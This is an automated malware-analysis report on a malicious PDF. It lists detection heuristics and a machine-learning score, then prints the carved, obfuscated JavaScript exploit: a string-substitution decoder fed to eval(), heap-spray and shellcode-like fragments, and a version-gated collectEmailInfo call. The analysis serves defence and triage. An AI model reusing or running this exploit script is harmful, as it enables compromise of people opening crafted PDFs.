MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded and obfuscated JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_EVAL heuristic firing suggests the script uses eval() to execute its content, a common technique for obfuscation and payload delivery. The script is likely designed to download and execute a second-stage payload. No specific family could be identified.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
O="%uFFFF% );var barb[ sil4 %u0 %u functio (){var ;var daru bas 6 .length 408B =unes mech n 7 .charA cape( =new boom c0c 8B Array( nog( , while solo 2e C 24 D0FF tring( smotr heap 3 ); 0x40000 ( 0]== DB33 ;} E8 5 1]<1) 2f 16 krik t( ar 9090 koli oll FF 3 EB 0 865 u kupl ){ zlos no EB F5 4 40 83 52".split(' ');Q=" stYt Yr L ! #( *2< +=P = .subsG0, /2Lreturn P W ^=0x0 0 p='R4 ', c=' 5 ' H=' 3?3574 378R6 6K2~33 49C9 AD41O F36 14BE 3828 4F2 C108 DCB DA0q4~3BEF … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x35E | 1295 bytes |
SHA-256: fbe6924bb337d34c9a60deba662dcd3144c77bc3a7761b8d889271c558309d02 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
O="%uFFFF% );var barb[ sil4 %u0 %u functio (){var ;var daru bas 6 .length 408B =unes mech n 7 .charA cape( =new boom c0c 8B Array( nog( , while solo 2e C 24 D0FF tring( smotr heap 3 ); 0x40000 ( 0]== DB33 ;} E8 5 1]<1) 2f 16 krik t( ar 9090 koli oll FF 3 EB 0 865 u kupl ){ zlos no EB F5 4 40 83 52".split(' ');Q=" stYt Yr L ! �#( *2< � +=P = .subsG0, /2Lreturn P W ^=0x0 0 �p='R4�',�c=' 5 ' H=' 3?3574 378R6� 6K2~33� 49C9 AD41O F36 14BE 3828 4F2 C108 DCB DA0q4~3BEF 5DFREE7REK24 6DD C 4B 1C5E DD03 4K C3C5 275 D6C E6F 42E C6?4300RC3A>55 065 C033 36�30� C78 0?1C7~ AD 8� 9� 8D34 C� 953?8�F E4EQE?`84�EC� �0�242?`3?95D~B�~1A36 02F FE8� ` 245�8DF?BA�OR35q�R3@ B�D FE98 E8AR3E8��` 4E?2C� 2@ �F E2D8Q73 `��`�QD~`D7�7468 07�2f3a 3Ue 56b c2d>70 16e f72>64 572 cUf 564>72 %' $ �p+�c+H+ u0065 000 �=$ *2 J=M0 =J-(�+0x38 ZZ L =! �=(^-M0)/J;for(vY =0; <�; ++�Yr[ ]= +$;}} gYa =app.viewerVersion.toSGL = .replace(/ D/g,'' bYb X0),X1),X2)Lif(N8&&(( 1]==1&& 2]<2)||T)||N7&&T||( 0]<7)�W( L#( <449�) += ;this.c_abStore=C_ab.c_ectEmailInfo({subj: ,msg: }L}} gYa(L}";o=" !#$>?@GHJKLMNOPQRTUWXYZ^_`q~ �����������";for(J=64;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(/ /g,'"').replace(/ /g,"\\").replace(/ /g,"\n"));
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.